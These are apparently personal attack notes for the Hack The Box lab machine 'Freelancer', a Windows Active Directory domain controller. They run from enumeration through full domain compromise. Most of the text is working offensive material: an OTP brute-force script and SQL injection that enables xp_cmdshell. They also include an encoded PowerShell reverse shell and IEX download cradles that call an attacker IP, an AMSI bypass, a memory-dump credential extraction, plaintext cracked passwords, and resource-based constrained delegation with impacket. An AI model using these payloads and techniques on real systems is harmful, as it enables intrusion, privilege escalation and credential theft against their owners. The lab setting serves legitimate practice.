1. Nmap
10.129.229.73
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 nginx 1.25.5
|_http-server-header: nginx/1.25.5
|_http-title: Did not follow redirect to http://freelancer.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-06-02 15:34:25Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49701/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-06-02T15:35:14
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 50033/tcp): CLEAN (Timeout)
| Check 2 (port 50702/tcp): CLEAN (Timeout)
| Check 3 (port 41283/udp): CLEAN (Timeout)
| Check 4 (port 23390/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 4h59m59s
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:35
Completed NSE at 11:35, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:35
Completed NSE at 11:35, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:35
Completed NSE at 11:35, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 151.81 seconds
Raw packets sent: 131086 (5.768MB) | Rcvd: 54 (2.376KB)
2. Vhosts
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://freelancer.htb/ -H 'Host: FUZZ.freelancer.htb' -fs 0
none found
3. Kerberos Queries
./kerbrute userenum -d freelancer.htb --dc freelancer.htb /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt -o users.freelancer
4. LDAP queries
ldapsearch -H ldaps://10.129.229.73:636/ -x -s base -b '' "(objectClass=*)" "*" + -> 0
nmap -n -sV --script "ldap* and not brute" 10.129.229.73 ->
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: freelancer.htb, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=freelancer,DC=htb
| ldapServiceName: freelancer.htb:dc$@FREELANCER.HTB
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedControl: 1.2.840.113556.1.4.2090
| supportedControl: 1.2.840.113556.1.4.2205
| supportedControl: 1.2.840.113556.1.4.2204
| supportedControl: 1.2.840.113556.1.4.2206
| supportedControl: 1.2.840.113556.1.4.2211
| supportedControl: 1.2.840.113556.1.4.2239
| supportedControl: 1.2.840.113556.1.4.2255
| supportedControl: 1.2.840.113556.1.4.2256
| supportedControl: 1.2.840.113556.1.4.2309
| supportedControl: 1.2.840.113556.1.4.2330
| supportedControl: 1.2.840.113556.1.4.2354
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=freelancer,DC=htb
| serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=freelancer,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=freelancer,DC=htb
| namingContexts: DC=freelancer,DC=htb
| namingContexts: CN=Configuration,DC=freelancer,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=freelancer,DC=htb
| namingContexts: DC=DomainDnsZones,DC=freelancer,DC=htb
| namingContexts: DC=ForestDnsZones,DC=freelancer,DC=htb
| isSynchronized: TRUE
| highestCommittedUSN: 860400
| dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=freelancer,DC=htb
| dnsHostName: DC.freelancer.htb
| defaultNamingContext: DC=freelancer,DC=htb
| currentTime: 20240602154508.0Z
|_ configurationNamingContext: CN=Configuration,DC=freelancer,DC=htb
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: freelancer.htb, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=freelancer,DC=htb
| ldapServiceName: freelancer.htb:dc$@FREELANCER.HTB
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedControl: 1.2.840.113556.1.4.2090
| supportedControl: 1.2.840.113556.1.4.2205
| supportedControl: 1.2.840.113556.1.4.2204
| supportedControl: 1.2.840.113556.1.4.2206
| supportedControl: 1.2.840.113556.1.4.2211
| supportedControl: 1.2.840.113556.1.4.2239
| supportedControl: 1.2.840.113556.1.4.2255
| supportedControl: 1.2.840.113556.1.4.2256
| supportedControl: 1.2.840.113556.1.4.2309
| supportedControl: 1.2.840.113556.1.4.2330
| supportedControl: 1.2.840.113556.1.4.2354
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=freelancer,DC=htb
| serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=freelancer,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=freelancer,DC=htb
| namingContexts: DC=freelancer,DC=htb
| namingContexts: CN=Configuration,DC=freelancer,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=freelancer,DC=htb
| namingContexts: DC=DomainDnsZones,DC=freelancer,DC=htb
| namingContexts: DC=ForestDnsZones,DC=freelancer,DC=htb
| isSynchronized: TRUE
| highestCommittedUSN: 860400
| dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=freelancer,DC=htb
| dnsHostName: DC.freelancer.htb
| defaultNamingContext: DC=freelancer,DC=htb
| currentTime: 20240602154508.0Z
|_ configurationNamingContext: CN=Configuration,DC=freelancer,DC=htb
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.52 seconds
5.1 Employer Account
Blocked by default
employerDani:dani123! new passe: qwertyuiop!
5. Port 80
http://10.129.229.73 [302 Found] Country[RESERVED][ZZ], HTTPServer[nginx/1.25.5], IP[10.129.229.73], RedirectLocation[http://freelancer.htb/], nginx[1.25.5]
http://freelancer.htb/ [200 OK]
Bootstrap, Country[RESERVED][ZZ],
Email[support@freelancer.htb],
HTML5, HTTPServer[nginx/1.25.5],
IP[10.129.229.73], JQuery, Script,
Title[Freelancer - Job Board & Hiring platform],
UncommonHeaders[cross-origin-opener-policy,referrer-policy,x-content-type-options],
X-Frame-Options[DENY],
nginx[1.25.5]
FUFF
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt:FUZZ -u http://freelancer.htb/FUZZ -v -recursion
6. Script
#!/bin/bash
for i in {1..30}
do
curl 'http://freelancer.htb/accounts/otp/qrcode/generate/' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
-H 'Accept-Language: en-US' \
-H 'Cache-Control: max-age=0' \
-H 'Cookie: sessionid=y1bm79i9fkbyb7iybbp8iy72qbrcpr3d; csrftoken=EOODEl70367Atu9Mye6732XZbz9ZvjrB' \
-H 'Proxy-Connection: keep-alive' \
-H 'Upgrade-Insecure-Requests: 1' \
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36' \
--insecure --silent --output qr.png
otp=$(zbarimg -q "qr.png" | cut -d'/' -f8)
encoded=$(echo $i | base64)
#echo "http://freelancer.htb/accounts/login/otp/${encoded}/${otp}/"
response=$(curl --write-out '%{http_code}' --silent --output /dev/null http://freelancer.htb/accounts/login/otp/${encoded}/${otp}/)
#echo $response
if [ "$response" -eq 302 ]; then
echo "Number $i worked as intended -> $encoded == http://freelancer.htb/accounts/login/otp/${encoded}/${otp}/"
fi
done
this iterates and retrieves the valid users. since it executes, a new otp must be generated
6. SMB
Enum4Linux
ββ$ enum4linux -a freelancer.htb -V
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jul 10 15:19:36 2024
=========================================( Target Information )=========================================
Target ........... freelancer.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on freelancer.htb )===========================
[E] Can't find workgroup/domain
===============================( Nbtstat Information for freelancer.htb )===============================
Looking up status of 10.129.192.223
No reply from 10.129.192.223
==================================( Session Check on freelancer.htb )==================================
[+] Server freelancer.htb allows sessions using username '', password ''
===============================( Getting domain SID for freelancer.htb )===============================
Domain Name: FREELANCER
Domain Sid: S-1-5-21-3542429192-2036945976-3483670807
[+] Host is part of a domain (not a workgroup)
===================( OS information on freelancer.htb )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for freelancer.htb from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
==========( Users on freelancer.htb )======================================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
==================( Share Enumeration on freelancer.htb )================================
do_connect: Connection to freelancer.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on freelancer.htb
==========( Password Policy Information for freelancer.htb )===========================
[E] Unexpected error from polenum:
[+] Attaching to freelancer.htb using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:FREELANCER.HTB)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
[E] Failed to get password policy with rpcclient
=============( Groups on freelancer.htb )======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=================( Users on freelancer.htb via RID cycling (RIDS: 500-550,1000-1050) )=================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
==============================( Getting printer info for freelancer.htb )==============================
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Wed Jul 10 15:20:04 2024
7. reverse shell_sqlinjection
Sqlterminal?
- sqlinjection
EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE; EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXECUTE xp_cmdshell 'mshta.exe http://10.10.14.23:80/shell.hta';
- mshta is not on the system!!
Shell: msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.23 lport=2314 -f hta-psh > shell2314.hta
Does not work⦠xp_cmdshell also do not work
select name as username,
create_date,
modify_date,
type_desc as type,
authentication_type_desc as authentication_type
from sys.database_principals
where type not in ('A', 'G', 'R', 'X')
and sid is not null
and name != 'guest'
order by username;
- Freelancer_webbapp_user found
https://stackoverflow.com/questions/39072965/how-do-i-swap-the-current-user-in-sql-server
EXECUTE AS LOGIN = 'sa'
SELECT IS_SRVROLEMEMBER('sysadmin')
#1 !!!
EXECUTE AS LOGIN = 'sa'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'
-- After running the above shell and not working...
SELECT name, CONVERT(INT, ISNULL(value, value_in_use)) AS IsConfigured
FROM sys.configurations
WHERE name = 'show advanced options'
--Gives 1
SELECT name, CONVERT(INT, ISNULL(value, value_in_use)) AS IsConfigured
FROM sys.configurations
WHERE name = 'xp_cmdshell'
--Gives 1
EXECUTE sp_configure 'show advanced options', 1
RECONFIGURE
EXECUTE sp_configure 'xp_cmdshell', 1
RECONFIGURE
EXECUTE xp_cmdshell 'cmd.exe /c powershell.exe -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMgAzACIALAAyADMAMQA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=='
Maybe load to memory via IEX?
https://github.com/sergiovks/AntiVirus-Bypass-PowerShell-In-Memory-Injection too long
EXECUTE sp_configure 'show advanced options', 1
RECONFIGURE
EXECUTE sp_configure 'xp_cmdshell', 1
RECONFIGURE
Execute xp_cmdshell 'powershell -c "IEX (iwr -usebasicparsing http://10.10.14.26/backup.bat);'
Attempt 2
LHOST=10.10.14.26
LPORT=443
rshell=shell-443.txt
pwsh -c "iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c $LHOST -p $LPORT -e cmd.exe -ge" > /tmp/$rshell
- Creates revshell
LHOST=10.10.14.26
LPORT_web=80
rshell=shell-443.txt
echo START /B powershell -c "\$code=(New-Object System.Net.Webclient).DownloadString('http://${LHOST}:${LPORT_web}/${rshell}');iex 'powershell -E \$code'" >/tmp/backup.bat
- Downloads the above shell Kinda works but no shell yet
Attempt 3
EXECUTE sp_configure 'show advanced options', 1
RECONFIGURE
EXECUTE sp_configure 'xp_cmdshell', 1
RECONFIGURE
Execute xp_cmdshell 'powershell -c "IEX (iwr -usebasicparsing \\10.10.14.26\share\oi);'
Attempt Final
https://github.com/martinsohn/PowerShell-reverse-shell this powershell works
EXECUTE sp_configure 'show advanced options', 1
RECONFIGURE
EXECUTE sp_configure 'xp_cmdshell', 1
RECONFIGURE
Execute xp_cmdshell 'powershell -c "IEX (iwr -usebasicparsing http://10.10.14.26/powershell-reverse-shell.ps1);"'
8. sql_svc Revshell
this folder has a ini 
Running the found passwords with all users enumerated
crackmapexec smb freelancer.htb -u /home/dani/Documents/OffSec/Machines/HTB/Freelancer/Users.md -p /home/dani/Documents/OffSec/Machines/HTB/Freelancer/passwords.md --shares --continue-on-success 
mikasaAckerman:IL0v3ErenY3ager
9. Revshell mickasa
.\RunasCs.exe mikasaAckerman IL0v3ErenY3ager cmd.exe -r 10.10.14.26:2314 
Hello Mikasa,
I tried once again to work with Liza Kazanoff after seeking her help to troubleshoot the BSOD issue on the "DATACENTER-2019" computer. As you know, the problem started occurring after we installed the new update of SQL Server 2019.
I attempted the solutions you provided in your last email, but unfortunately, there was no improvement. Whenever we try to establish a remote SQL connection to the installed instance, the server's CPU starts overheating, and the RAM usage keeps increasing until the BSOD appears, forcing the server to restart.
Nevertheless, Liza has requested me to generate a full memory dump on the Datacenter and send it to you for further assistance in troubleshooting the issue.
Best regards,
$s =[Ref].Assembly.GetType([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5BbXNpVXRpbHM=')))
$f = $s.GetField([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('YW1zaUluaXRGYWlsZWQ=')), 'NonPublic,Static')
$f.SetValue($null, $true)
Killed amsi
Now use oi.ps1 to load a shell meterpreter to memory.
Run using: IEX (iwr -usebasicparsing http://10.10.14.26/oi.ps1);
- Works!!
10. Memory Dump
install volatility python3 vol.py -f ../MEMORY.DMP windows.lsadump > lsa.dump
PWN3D#l0rr@Armessa199
again crackmapexec: crackmapexec smb freelancer.htb -u /home/dani/Documents/OffSec/Machines/HTB/Freelancer/Users.md -p /home/dani/Documents/OffSec/Machines/HTB/Freelancer/passwords.md --shares --continue-on-success
Worked: freelancer.htb 445 DC [+] freelancer.htb\lorra199:PWN3D#l0rr@Armessa199
Checking bloodhound: bloodhound-python -c all --dns-tcp --zip -u 'lorra199' -p 'PWN3D#l0rr@Armessa199' -ns 10.129.151.81 -d freelancer.htb
The email sugests the possibility of adding a computer: impacket-addcomputer -computer-name 'BADPC$' -computer-pass 'SomePassword' -dc-host freelancer.htb -domain-netbios freelancer.htb freelancer/lorra199:'PWN3D#l0rr@Armessa199' `
11. Resource-Based Constrained Delegation
impacket-rbcd -delegate-from 'BADPC$' -delegate-to 'DC$' -action 'write' freelancer/lorra199:'PWN3D#l0rr@Armessa199' -dc-ip freelancer.htb
impacket-getST -spn 'cifs/DC.freelancer.htb' -impersonate 'Administrator' 'freelancer/BADPC$:SomePassword' -dc-ip freelancer.htb
worked 
https://wadcoms.github.io/wadcoms/Impacket-PsExec-PassTheTicket/
export KRB5CCNAME=/home/dani/Documents/Machines/Freelancer/Administrator@cifs_DC.freelancer.htb@FREELANCER.HTB.ccache; impacket-psexec dc.freelancer.htb -k -no-pass
accepts ticket but does not load
secretsdump? 
Info
http://freelancer.htb/freelancer/register/
- The password is too similar to the username.
- This password is too short. It must contain at least 8 characters.
- This password is too common.
- This password is entirely numeric.
passwords
t3mp0r@ryS@PWD IL0v3ErenY3ager PWN3D#l0rr@Armessa199
Users
taylor jgreen sdavis dthomas administator jmartinez sql_svc lkazanof lorra199 mikasaAckerman sqlbackupoperator MSSQLSERVER